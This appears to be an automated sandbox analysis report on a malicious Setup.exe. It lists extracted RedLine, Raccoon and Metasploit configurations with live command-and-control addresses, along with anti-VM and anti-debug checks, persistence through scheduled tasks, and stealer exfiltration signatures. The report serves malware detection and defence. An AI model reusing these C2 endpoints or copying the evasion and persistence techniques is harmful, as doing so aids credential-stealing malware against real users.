Resubmissions
03-09-2021 12:16
210903-pfn3ysdac4 1003-09-2021 04:55
210903-fj6mqsfbfk 1002-09-2021 19:23
210902-x37sksbef5 1002-09-2021 15:02
210902-senycadeck 1002-09-2021 11:29
210902-4b2x2c3ahj 1002-09-2021 05:46
210902-lng5vcn31n 1002-09-2021 04:57
210902-gp7zs88ann 1001-09-2021 17:32
210901-sgcvvtysvs 1031-08-2021 12:57
210831-1v8aywj16x 1031-08-2021 07:34
210831-n7h9w45r3x 10Analysis
-
max time kernel
618s -
max time network
626s -
platform
windows10_x64 -
resource
win10-de -
submitted
02-09-2021 05:46
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
Setup.exe
Resource
win7-en
Behavioral task
behavioral4
Sample
Setup.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
Setup.exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup.exe
Resource
win10-en
Behavioral task
behavioral7
Sample
Setup.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
Setup.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
Setup.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
Setup.exe
Resource
win10-de
General
-
Target
Setup.exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
1
37.0.8.88:44263
Extracted
redline
spnewportspectr
135.148.139.222:1594
Extracted
redline
193.56.146.60:16367
Extracted
raccoon
d02c5d65069fc7ce1993e7c52edf0c9c4c195c81
-
url4cnc
https://telete.in/open3entershift
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral10/memory/2208-283-0x0000000004680000-0x0000000004FA6000-memory.dmp family_glupteba behavioral10/memory/2208-302-0x0000000000400000-0x000000000259B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6208 4312 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1380 4312 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 22 IoCs
Processes:
resource yara_rule behavioral10/memory/5092-241-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/5092-239-0x0000000000400000-0x000000000044A000-memory.dmp family_redline behavioral10/memory/4164-263-0x000000000041C5EE-mapping.dmp family_redline behavioral10/memory/4164-259-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral10/memory/5092-258-0x0000000005180000-0x0000000005786000-memory.dmp family_redline behavioral10/memory/4128-279-0x00000000023A0000-0x00000000023BD000-memory.dmp family_redline behavioral10/memory/4128-287-0x0000000003F10000-0x0000000003F2C000-memory.dmp family_redline behavioral10/memory/2400-331-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/2400-341-0x00000000050B0000-0x00000000056B6000-memory.dmp family_redline behavioral10/memory/5652-364-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/5804-390-0x000000000041C5EE-mapping.dmp family_redline behavioral10/memory/6020-403-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/5400-426-0x000000000041C5EE-mapping.dmp family_redline behavioral10/memory/4860-436-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/4896-458-0x000000000041C5EE-mapping.dmp family_redline behavioral10/memory/4920-461-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/1516-479-0x000000000041C5EE-mapping.dmp family_redline behavioral10/memory/5200-489-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/4376-513-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/1580-547-0x000000000041C5EE-mapping.dmp family_redline behavioral10/memory/5976-558-0x000000000041C5BE-mapping.dmp family_redline behavioral10/memory/6232-572-0x000000000041C5EE-mapping.dmp family_redline -
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral10/memory/1764-240-0x0000000002D30000-0x0000000002E03000-memory.dmp family_vidar behavioral10/memory/1764-264-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
Processes:
Z93VzqaNWtjd5VRixOVgMODo.exemhWe_FDhSpNOUE8tGRp7tzbG.exe3XigsTU6eAHS_B0eWt2m9GcW.exeeVtDy2kmSwURtva2vBMA9qU6.exezsI5t_eJTJVnSpRUvfyY0ZV0.exe2dRkySXfpzhrHfXqbMfr2Dh6.exe3CzjcI0lz_q8pGaAxMLxiexU.exeiZXDunGUmJUrMAjkcm1HiYnD.exeB6yowxV8LsKL_sh6fD4dEqTq.exepn1CRHJihlF7AUiO8r9WkjsW.exeJuy1Klom0iHRt0cpliJhPTvO.exezUJh9p7ry0bJHslkedqN_gmr.exe4bNPM6sKOX2oYBMUz4QrBqSP.exeybDkP2sQ6_pLyun1GoApuo9P.exeUw2nsLbf3aKDMOvE9SBpKWI8.exerwtUE2DGUjdKpne200zgB3n4.exe09WJtjb0y0ANJSkCvy24hF8U.execFn2qvDmPErwLIIqQl73UGcj.exe9mqE7ddKs1O09wKSholqPSoG.exehCYV1iHrYQwv8E3zOWNX11r3.exe4bNPM6sKOX2oYBMUz4QrBqSP.tmpZ93VzqaNWtjd5VRixOVgMODo.exemhWe_FDhSpNOUE8tGRp7tzbG.exeZ93VzqaNWtjd5VRixOVgMODo.exeWerFault.exepid process 372 Z93VzqaNWtjd5VRixOVgMODo.exe 2624 mhWe_FDhSpNOUE8tGRp7tzbG.exe 808 3XigsTU6eAHS_B0eWt2m9GcW.exe 1256 eVtDy2kmSwURtva2vBMA9qU6.exe 2540 zsI5t_eJTJVnSpRUvfyY0ZV0.exe 1020 2dRkySXfpzhrHfXqbMfr2Dh6.exe 4136 3CzjcI0lz_q8pGaAxMLxiexU.exe 1796 iZXDunGUmJUrMAjkcm1HiYnD.exe 4112 B6yowxV8LsKL_sh6fD4dEqTq.exe 1764 pn1CRHJihlF7AUiO8r9WkjsW.exe 4144 Juy1Klom0iHRt0cpliJhPTvO.exe 2208 zUJh9p7ry0bJHslkedqN_gmr.exe 4212 4bNPM6sKOX2oYBMUz4QrBqSP.exe 4200 ybDkP2sQ6_pLyun1GoApuo9P.exe 4104 Uw2nsLbf3aKDMOvE9SBpKWI8.exe 4128 rwtUE2DGUjdKpne200zgB3n4.exe 4120 09WJtjb0y0ANJSkCvy24hF8U.exe 2120 cFn2qvDmPErwLIIqQl73UGcj.exe 1472 9mqE7ddKs1O09wKSholqPSoG.exe 4080 hCYV1iHrYQwv8E3zOWNX11r3.exe 4652 4bNPM6sKOX2oYBMUz4QrBqSP.tmp 5068 Z93VzqaNWtjd5VRixOVgMODo.exe 5092 mhWe_FDhSpNOUE8tGRp7tzbG.exe 4164 Z93VzqaNWtjd5VRixOVgMODo.exe 4320 WerFault.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Uw2nsLbf3aKDMOvE9SBpKWI8.exe2dRkySXfpzhrHfXqbMfr2Dh6.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Uw2nsLbf3aKDMOvE9SBpKWI8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Uw2nsLbf3aKDMOvE9SBpKWI8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2dRkySXfpzhrHfXqbMfr2Dh6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2dRkySXfpzhrHfXqbMfr2Dh6.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Setup.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Setup.exe -
Loads dropped DLL 2 IoCs
Processes:
4bNPM6sKOX2oYBMUz4QrBqSP.tmppid process 4652 4bNPM6sKOX2oYBMUz4QrBqSP.tmp 4652 4bNPM6sKOX2oYBMUz4QrBqSP.tmp -
Processes:
resource yara_rule C:\Users\Admin\Documents\2dRkySXfpzhrHfXqbMfr2Dh6.exe themida C:\Users\Admin\Documents\Uw2nsLbf3aKDMOvE9SBpKWI8.exe themida C:\Users\Admin\Documents\Uw2nsLbf3aKDMOvE9SBpKWI8.exe themida C:\Users\Admin\Documents\2dRkySXfpzhrHfXqbMfr2Dh6.exe themida behavioral10/memory/1020-206-0x0000000000970000-0x0000000000971000-memory.dmp themida behavioral10/memory/4104-205-0x0000000000CC0000-0x0000000000CC1000-memory.dmp themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
2dRkySXfpzhrHfXqbMfr2Dh6.exeUw2nsLbf3aKDMOvE9SBpKWI8.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2dRkySXfpzhrHfXqbMfr2Dh6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Uw2nsLbf3aKDMOvE9SBpKWI8.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 35 ipinfo.io 118 ipinfo.io 180 freegeoip.app 182 freegeoip.app 218 ipinfo.io 219 ipinfo.io 1324 ipinfo.io 36 ipinfo.io 116 ipinfo.io 120 ipinfo.io 396 ipinfo.io 1325 ipinfo.io 109 ip-api.com 183 freegeoip.app 188 freegeoip.app 389 ipinfo.io -
Drops file in System32 directory 8 IoCs
Processes:
OfficeC2RClient.exeOfficeC2RClient.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml OfficeC2RClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db OfficeC2RClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db-journal OfficeC2RClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db-wal OfficeC2RClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db-shm OfficeC2RClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat OfficeC2RClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat OfficeC2RClient.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml OfficeC2RClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
Uw2nsLbf3aKDMOvE9SBpKWI8.exe2dRkySXfpzhrHfXqbMfr2Dh6.exepid process 4104 Uw2nsLbf3aKDMOvE9SBpKWI8.exe 1020 2dRkySXfpzhrHfXqbMfr2Dh6.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
mhWe_FDhSpNOUE8tGRp7tzbG.exeZ93VzqaNWtjd5VRixOVgMODo.exedescription pid process target process PID 2624 set thread context of 5092 2624 mhWe_FDhSpNOUE8tGRp7tzbG.exe mhWe_FDhSpNOUE8tGRp7tzbG.exe PID 372 set thread context of 4164 372 Z93VzqaNWtjd5VRixOVgMODo.exe Z93VzqaNWtjd5VRixOVgMODo.exe -
Drops file in Program Files directory 5 IoCs
Processes:
3XigsTU6eAHS_B0eWt2m9GcW.exedescription ioc process File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe 3XigsTU6eAHS_B0eWt2m9GcW.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe 3XigsTU6eAHS_B0eWt2m9GcW.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 3XigsTU6eAHS_B0eWt2m9GcW.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 3XigsTU6eAHS_B0eWt2m9GcW.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 3XigsTU6eAHS_B0eWt2m9GcW.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 40 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5036 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 2776 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 4508 4144 WerFault.exe Juy1Klom0iHRt0cpliJhPTvO.exe 4360 2208 WerFault.exe zUJh9p7ry0bJHslkedqN_gmr.exe 4244 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 3152 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 4952 4144 WerFault.exe Juy1Klom0iHRt0cpliJhPTvO.exe 1004 2208 WerFault.exe zUJh9p7ry0bJHslkedqN_gmr.exe 1244 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 4276 2208 WerFault.exe zUJh9p7ry0bJHslkedqN_gmr.exe 4444 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 2860 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 4304 2208 WerFault.exe zUJh9p7ry0bJHslkedqN_gmr.exe 1520 4144 WerFault.exe Juy1Klom0iHRt0cpliJhPTvO.exe 5192 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 5324 4144 WerFault.exe Juy1Klom0iHRt0cpliJhPTvO.exe 5436 2208 WerFault.exe zUJh9p7ry0bJHslkedqN_gmr.exe 5480 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 5540 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 5684 2208 WerFault.exe zUJh9p7ry0bJHslkedqN_gmr.exe 5828 4144 WerFault.exe Juy1Klom0iHRt0cpliJhPTvO.exe 5844 4144 WerFault.exe Juy1Klom0iHRt0cpliJhPTvO.exe 5860 4144 WerFault.exe Juy1Klom0iHRt0cpliJhPTvO.exe 5996 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 6140 5652 WerFault.exe mhWe_FDhSpNOUE8tGRp7tzbG.exe 5192 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 6092 6020 WerFault.exe mhWe_FDhSpNOUE8tGRp7tzbG.exe 5544 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 736 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 4116 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 5940 4920 WerFault.exe mhWe_FDhSpNOUE8tGRp7tzbG.exe 5584 3512 WerFault.exe Bf4YOJOO.exe 4320 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 5432 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 3860 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 6256 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 6400 4200 WerFault.exe ybDkP2sQ6_pLyun1GoApuo9P.exe 6540 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 6784 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe 6916 4080 WerFault.exe hCYV1iHrYQwv8E3zOWNX11r3.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5900 schtasks.exe 5952 schtasks.exe 5236 schtasks.exe 11912 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1396 timeout.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6244 taskkill.exe 6860 taskkill.exe 5912 taskkill.exe 7748 taskkill.exe 7760 taskkill.exe -
Modifies data under HKEY_USERS 59 IoCs
Processes:
OfficeC2RClient.exeOfficeC2RClient.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officec2rclient.exe_queried = "1630561900" OfficeC2RClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officec2rclient.exe&Version=16.0.12527.20470&ClientId={7B695CFF-1492-4164-B513-7AE896D88A38}&OSEnvironment=10&MsoAppId=37&AudienceName=Audience_Liblet_Not_Initialized&AudienceGroup=Other&AppVersion=16.0.12527.20470&" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OfficeC2RClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\RulesLastAudienceReported\officec2rclient.exe = "Audience_Liblet_Not_Initialized" OfficeC2RClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,39965824,7153487,17110988,17962391,17962392,3702920,3462423,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeC2RClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,941 10,1329 15,941 15,1329 100,941 6,1329 6" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\ULSMonitor OfficeC2RClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,39965824,7153487,17110988,17962391,17962392,3702920,3462423,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeC2RClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officec2rclient.exe = "Thu, 02 Sep 2021 05:48:10 GMT" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeC2RClient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Identity\Version = "1" OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeC2RClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,941 10,1329 15,941 15,1329 100,941 6,1329 6" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeC2RClient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\ULSMonitor OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe\ULSMonitor OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeC2RClient.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeC2RClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeC2RClient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeC2RClient.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 OfficeC2RClient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officec2rclient.exe OfficeC2RClient.exe -
Processes:
Setup.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9